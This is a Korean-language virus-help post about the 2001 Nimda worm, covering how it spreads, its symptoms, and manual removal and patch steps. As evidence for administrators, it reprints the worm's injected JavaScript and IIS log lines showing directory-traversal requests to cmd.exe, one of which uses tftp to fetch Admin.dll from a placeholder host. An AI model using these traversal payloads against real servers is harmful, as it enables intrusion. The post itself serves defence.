안녕하세요.
ANTI CIH 바이러스 홈페이지 //www.ebo.co.kr/cih 관리자 김영빈 입니다.

Nimda 웜 라는 바이러스로써 아웃룩 주소록을 검색하여 사용자에게 readme.exe, readme.exe (숫자), sample.exe 파일을 첨부하여 메일을 발송을 하며. 읽기/쓰기 가능하도록 공유된 컴퓨터의 경우 네트워크를 통해서도 전파됩니다. 그리고 각 폴더마다 내 문서(My Documents) 에 있는 파일을 *.eml 혹은 *.nws 파일로 생성합니다. 사용자 컴퓨터의 모든 드라이브를 공유시킨다.(공유를 해제해도 재부팅시에 다시 공유가 됨)

혹시 이런 메일을 받으신 분들은 즉시 삭제를 부탁드리며, 이미 파일 첨부된 readme.exe 파일을 실행을 하신 분들의 경우는 오늘 날짜의 하우리의 바이로봇 for MS-DOS (매크로 바이러스 진단/치료 불능), 또는 S&S의 Turbo Vaccine 2001 (PV.6407) 로 치료 하시기 바랍니다.

또는 하우리에서 발표한 전용 백신 [링크1] [링크2] [링크3] [하우리] 을 사용하시거나
안철수 연구소에서 제공한 전용 백신 [링크1]
트랜드 마이크로에서 제공한 전용 백신 [링크1]
시만텍에서 발표한 전용 백신
mcafee 에서 발표한 전용 백신 f-secure에서 발표한 전용 백신 을 사용 하시기 바랍니다,
하우리 제공 님다 전용 온라인 백신 : [링크1] [링크2] [링크3] [하우리]
☞ MS 패치 다운로드 사이트
☞ 바이로봇 Code-X 체험판 다운로드 : 바로가기
코드 블루 웜 전용백신
코드 레드 웜 전용백신 사용방법

수동 치료 방법

[윈도우 95/98/ME 계열]


▶ 감염경로
email을 통한 클라이언트에서 클라이언트로
오픈된 네트웍자원을 통한 클라이언트에서 클라이언트로
감염된 웹사이트 접속을 통한 웹서버로에서 클라이언트로
Microsoft IIS 4.0 / 5.0 directory traversal 취약점 통한 클라이언트에서 웹서버로
Code Red II와 sadmin/IIS 웜에 의해서 만들어진 백도어를 통한 클라이언트에서 웹서버로

▶ 증상

1) 감염된 클라이언트는 Windows address book에 있는 모든 주소로 Nimda 웜을 포함한 E-mail을 전송하려고 시도한다.

2) Code Red II와 sadmin/IIS 웜에 의해서 만들어진 백도어를 스캐닝하여 공격하거나, IIS Directory Traversal 취약점을 통해서도 전파가능하다. 공격IP 생성룰은 다음과 같다.

50%는 동일한 B class IP 주소(처음두개의 octet이 같은 IP주소)
25%는 동일한 A class IP 주소(첫번째 octet이 같은 IP주소)
25%는 랜덤한 IP 주소

3) 감염된 클라이언트 시스템은 취약점을 스캔하여 발견된 서버로 Nimda 코드를 전송하며, 서버시스템이 일단 감염되면 시스템의 모든 디렉토리를 감염시킨다(파일공유를 통한 엑세스 가능한 모든 파일을 포함). "README.EML" 이름을 사용해서 디스크 자체에 카피한다. 또한 감염된 시스템의 C 로컬 드라이브가 공유되므로 보안상 문제가 될 수 있다. 웹컨텐츠를 포함한 디렉토리가 발견되었을 때, 다음의 Javascript 코드가 웹관련파일에 추가된다.

<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

이러한 웹컨텐츠의 변경은 네트웍 파일시스템을 브라우징하거나 브라우저를 통해 새로운 클라이언트에게 전파시킨다.

4) system.ini 파일을 아래와 같이 변경한다.

Shell = explorer.exe load.exe -dontrunold → Shell = explorer.exe

5) riched20.dll을 변경한다. riched20.dll은 Microsoft Word같은 응용프로그램에서 사용하는 Windows .Dll파일이다. 이러한 .Dll 파일을 변경함으로서 Microsoft Word같은 응용프로그램이 실행될때 웜이 실행되어질 수 있다.

6) load.exe 파일이 %WindowSystem%에 숨김파일옵션으로 생성된다.(%WindowsSystem% 은 가변적이며, 디폴트는 C:WindowsSystem이다)

7) Windows Temporary Directory에 아래의 임시파일을 생성한다.

mep[nr][nr][letter][nr].TMP.exe
mep[nr][nr][letter][nr].TMP

8) 일단 Nimda에 감염이 되면, 웜은 감염시스템에 원격공격자로 하여금 시스템에 접근할 수 있도록 해주는 개정을 만듬으 로서 "backdoor"를 만들수도 있다. "guest" 계정이 존재하지 않으면 "guest" 계정을 생성하며, "guest"계정이 disable상태라면 "guest"계정을 활성화시킨다. "guest"계정은 "Guests"와 "Administators" group에 추가된다.(감염방법에 따라서 증상이 달라질 수 있다)

9) 모든 드라이브가 공유 된다. (레지스트리 SoftwareMicrosoftWindowsCurrentVersionExplorerMapMai

▶ 감염경로

1. Email을 통한 전파
이 웜은 두 개의 섹션으로 구성된 MIME "multipart/alternative" 메시지를 통해 전파된다. 첫 번째 섹션은 MIME 타입 "text/html"을 정의하고 있으며 어떠한 text도 포함하고 있지 않다. 따라서 E-mail은 어떠한 컨텐츠도 포함하고 있지 않다. 두 번째 섹션은 MIME 타입 "audio/x-wav"를 정의하고 있으며, base64로 암호화된 실행가능한 바이너리 코드인 "readme.exe"이름의 파일을 포함하고 있다.

"Automatic Execution of Embedded MIME Types" 취약점(//www.certcc.or.kr/advisory/ka2001/ka2001-025.txt)을 통해서 HTML 메일을 자동으로 실행시키는 Microsoft Intetnet Explorer 5.5 SP1 이나 그 이전버전(IE 5.01 SP2를 제외한)을 사용하는 x86 플랫폼상에서 구동되는 메일 소프트웨서는 이 웜에 감염된다. 따라서 이 웜은 이 메일을 간단히 열어봄으로서 자동으로 감염되며, 실행코드기 때문에 첨부파일을 실행시킴으로서 간단히 감염될 수 있다.(즉, 첨부파일을 실행시키지 않고 단순히 메일을 읽기만해도 감염된다)

Nimda 웜을 전파하는 E-mail은 다음의 특징을 가지고 있다.

메일의 제목란의 문자는 가변적이지만 80문자 이상이다.
첨부된 바이너리 파일에 근소한 차이가 있다. 이것은 MD5 Checksum이 다르기 때문이다. 그러나, 첨부파일의 파일길이는 일관되게 57344 바이트이다.

2 브라우저 전파
Nimda웜은 모든 웹컨텐츠 파일(index.htm, index.htm, index.asp, readme.html, readme.htm, readme.asp, main.html, main.htm, main.asp, default.html, default.htm, default.asp )을 변경하고 readme.eml 파일을 복사해둔다. 그 결과 감염된 시스템에 있는 웹컨텐츠를 브라우징하는 사용자는 웜(readme.eml)을 다운받는다. 몇몇 보안 patch가 적용되지 않은 Internet Explorer 브라우저는 다운로드받은 파일을 자동으로 실행시켜서 시스템을 감염시킨다.

3. File System 전파
Nimda 웜은 쓰기가능한 모든 디렉토리(네트웍공유에서 발견되는 디렉토리 포함) 에 README.EML 이름의 수많은 카피를 생성한다. 만약 다른 시스템의 사용자가 공유된 네트웍에서 웜파일의 카피본을 preview 옵션이 가능한 Windows Explorer에서 선택했다면, 웜에 감염될 수 있다.

▶ 치료방법

C:WindowsSystem 폴더에 load.exe(57,344바이트) 파일이 존재하는지 확인하십시오.

1. 존재하지 않을 경우

(1) 공유되어 있는 폴더를 해제합니다.
(2) 시스템에 *.eml 파일들이 있는지 확인하여 삭제하십시오.
(3) 시스템에 *.nwz 파일들이 있는지 확인하여 삭제하십시오.


2. 존재하는 경우

(1) 공유되어 있는 폴더를 해제합니다.
(2) 윈도우 [시작]-[실행]에서 'system.ini'를 입력합니다.
(3) system.ini의 내용 중 'Shell = explorer.exe load.exe -dontrunold'로 되어 있는 부분을 'Shell = explorer.exe'로 수정합니다.
(4) 시스템을 재부팅합니다.
(5) C:WindowsSystem 폴더에 있는 load.exe(57,344바이트) 파일을 삭제합니다.
(6) C:WindowsSystem 폴더에 있는 riched20.dll(57,344바이트, 숨김속성) 파일을 삭제합니다.

load.exe를 찾기전에 탐색기의
[보기]-[폴더옵션]-[보기]-[모든파일 표시]를 체크하셔야 합니다.

- 정상적인 riched20.dll 파일이 존재할 수 있으므로 반드시 파일크기를 확인한 후 삭제하시기 바랍니다.
(7) 시스템에 *.eml 파일들이 있는지 확인하여 삭제하십시오.
(8) 시스템에 *.nwz 파일들이 있는지 확인하여 삭제하십시오.

* 공유폴더를 설정해 놓을 경우 네트워크를 통해 재감염이 될 수 있으므로, 반드시 해제하고 사용하시기 바랍니다.

Internet Explorer 사용자의 경우 다음 패치를 적용하거나
//www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp

Internet Explorer 5.01 SP2를 설치하거나
Internet Explorer 5.5 SP2를 설치하거나
Internet Explorer 6.0을 설치합니다

▶ Outlook 2000 사용자의 경우, 다음 패치를 설치합니다

//office.microsoft.com/downloads/2000/outlctlx.aspx

▶ Outlook 2002 (Office XP) 사용자의 경우, 다음 패치를 설치합니다

//office.microsoft.com/downloads/2000/outlctlx.aspx

[ 윈도우 2000 / NT 사용자 경우 ] -(웹 서버 관리자 필수)

▶ 시스템 증거
포트 80/tcp을 통한 Web 서버로그

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe, /c+tftp%20-i%20xxx.xxx.xxx.xxx%20GET%20Admin.dll%20d:Admin.dll
GET /msadc/..%5c../..%5c../..%5c/..../..../..../Admin.dll
GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Note: 첫 번째 네줄은 Code Red II에 의해서 만들어진 백도어를 검색시도하는 로그이며, 나머지 로그는 Directory Traversal 취약점을 공격하기 위한 로그이다.

▶ 영향
공격자는 패치되지 않은 IIS가 구동되는 시스템의 LocalSystem security context에서 공격코드를 실행시킬 수 있으며, 감염된 호스트는 다른 인터넷사이트를 공격할 수 있다. 또한 Nimda 웜에 의해서 발생하는 스캐닝은 Dos공격을 유발시킬 수 있다.


▶ 치료방법

root.exe (Code Red II 혹은 sadmin/IIS 웜에 의해서 공격당한 증거)
admin.dll 혹은 기대되지 않은 .eml 파일(웹 컨텐츠를 포함하고 있는 디렉토리내에)
o 다음은 정상적인 파일입니다.
- c:inetPubwwwroot_vti-bin_vti_admadmin.dll
- c:Program FilesMicrosoft FrontPageversion3.0isapi_vti-bin_vti_admadmin.dll

가장 안전한 시스템 복구방법은 시스템을 포맷하고 재인스톨하는 것입니다.
덧붙여 소프트웨어를 재인스톨한후에는 네트웍에 접속하지 않은 상태에서 모든 제품사가 제공하는 보안패치를 적용하시기 바랍니다.

IIS 웹 서버를 운영할 경우 아래의 내용의 취약점을 이용하여 웜이 전파되기도 한다. 따라서 다음의 취약점에 대한 패치를 해주어야한다.

//www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp

* 웜이 첨부된 메일을(또는 확장자 *.NWS 파일을) 읽기만 하거나 미리보기 하여도 웜에 감염되는 것은 "Incorrect MIME Header Can Cause IE to Execute E-mailAttachment" 취약점 때문이며 다음의 사이트를 참고하도록 한다.

//www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp

코드 블루 웜 전용백신 을 사용한다.
DuBa_CodeBlue.exe

Micrrosoft IIS 4.0 (윈도우 NT):
//www.microsoft.com/Downloads/Release.asp?ReleaseID=32061

Microsoft IIS 5.0 (윈도우 2000 서버):
//www.microsoft.com/Windows2000/download.asp

IIS서버 운영을 중단(모든 인터넷정보서비스)시킨후 Norton anti virus사용자는 해당 서비스를 멈춘후 윈도우 시작후 자동검사실행 옵션 체크하지 마시고 재부팅후 해당파일들을 모두 삭제시켜줍니다.
그러면 컴퓨터 리소스를 잡아먹는 일은 하지 않을것입니다.
1. 각 드라이브에 admin.dll
2. 각 드라이브에 t~~로 시작하여 쌓여있는 모든 파일들
3. winnt/temp에 t_로 시작하여 쌓여있는 모든 파일들
4. inetpub/script에 쌓여있는 모든 파일들
5. 모든 드라이브(각 하위디렉토리포함)에 *.eml, *.nwz파일들

조치전 : 컴퓨터가 버벅거린다. 시스템 리소스를 무엇인가 계속 사용하고 있고 하드디스크에 불필요한 파일들이 쌓여간다.

조치후 : 컴퓨터 리소스에 대하여 사용시 느낄수 있는 부분이 없다.
다시 하드드라이브에 Nimda와 관련한 파일들이 생성되지 않는다.

▶ 미해결 문제점
1. 이 단계에서 IIS서버를 재시작하면 다시 처음 상황으로 돌아간다.
2. 어떤 엔진에 의하여 웹서버 Root디렉토리에 있는 default,main명으로 확장자(htm,html,asp)파일들이 일정시간후 자동으로 밑에 readme.eml파일을 오픈시키는 스크립트가 들어간다.
→ 참고사항
아직 실험은 못해봤지만 개인적인 추측으로는 루트디렉토리에 저파일명을 가진 파일들에 Timer를 걸어 일정시간을 주기로 계속 readme.eml파일을 실행시키는 스크립트가 들어가고 이후에 웹서버에 접근한 사용자가 저 파일을 실행시키면서 오픈스크립트가 안들어간 페이지를 열어보면 스크립트가 추가 된다고 추측됨

1.mmc.exe 파일감염...
안되면 걍 다시 셋업하심이..... 다시 설치합니다... 그런데 다시 설치해도 아래와 같은 문제가 생길 수 있습니다... ㅡㅡ;; 수동으로 잡아주세요..

2. admin.dll 56kb 파일 생성...
백신으로 치료해도 계속 생성되는 경우...
강제로 삭제하셔도 잠시후 또 생성됩니다.. 이름 바꿔도 또 생성됩니다.. 나름대로의 해결책은 메모장 연다음 빈 파일 하나 생성하셔서 admin.dll 파일로 저장하는 겁니다... 바이러스 감염파일이 읽기 전용으로 되어있으니 파일의 등록정보에서 읽기전용 속성을 해제하시고 빈 파일을 덮어쓰는겁니다... 쓰시고 등록정보에서 읽기전용으로 하시구요... admin.dll 파일은 c: d: e: 디렉토리에 생성됩니다... 이미 파일이 존재하면 새로 생성하지는 않더군요...

3. 제가 고생한 또 다른내용은 riched20.dll 파일이 시스템 파일로서 생성된다는 겁니다.. 백신으로 치료해도 그대로 남아있고.. 탐색기 가보면 안보이고... 폴더옵션의 보호된 운영파일 시스템 숨기기 체크 해제하시면 보일겁니다... 그것들 다 지워야 하는데 어느 프로세서를 죽이고 해야하는지 몰라서 안전모드 부팅한다음에 강제로 다 지웠습니다... 그리고 지우실때 파일크기 확인하시고 지우셔야 합니다... 57344 byte 입니다.. 이것만 지우세요... 많이 지우셔야 할겁니다..

[TIP] 윈도우 2000 이렇게 하면 님다 잡을 수 있다?
1.윈도 2000 보안패치를 꼭받아 설치 하기 바란다.. 꼭
(제 소견으로는 저희 CIH 바이러스 홈페이지 전용 백신에 등록되어 있는 코드레드, 코드블루 웜을 설치 하세요.^^)
2.통신연결 안되게한다(전원케이블이나.랜케이블 뽑기)
3.c:winntsystem32tftp.exe를 걍 무쟈비하게 지우자!
4.바이러스검사를 한다...... 쭉~~~ 되겠져하거 리붓
5.재실행하고 인터넷열결을 한다 통신연결

▶ 문제점 해결
님다 바이러스 감염후..워드/엑셀 실행이 불가능시

만약 워드,엑셀등 프로그램 실행이 불가능할 경우에는 "riched20.dll"파일이 바이러스로 인하여 손상되었으므로 정상적인 시스템(바이러스가 감염되지 않은 같은 윈도우버전의 시스템)에서 복사 후 윈도 시스템폴더 (WindowsSystem 또는 WINNTSystem32)에 복사해 넣은면 됩니다.

하지만,위에 작업에서는 이 바이러스가 감염시킨 원본 파일은 복구 할 수 없으므로 백신업체에서 전용백신등의 최신버전의 백신으로 반드시 치료하세요.

윈도우 98 riched20.dll 다운로드 하기

윈도우 ME riched20.dll 다운로드 하기

윈도우 2000 riched20.dll 다운로드 하기

[TIP] TFTPxxx치료하려면
1. 로컬디스크(C:나D:)을 클릭한후 오른쪽마우스 클릭
2. 등록정보클릭
3. 웹공유 해제하고
4. 나와있는 기존 님다백신으로 치료
5. 재부팅

갈최 : 안철수 연구소, 하우리, AVZONE, CERTCC-KR

starsnara 님 제공 각 백신/보안 회사들의 님다 바이러스 치료 방법.
안철수 연구소 코드레드 시큐아이 에브리존 시만텍 트렌드코리아 세넥스 하우리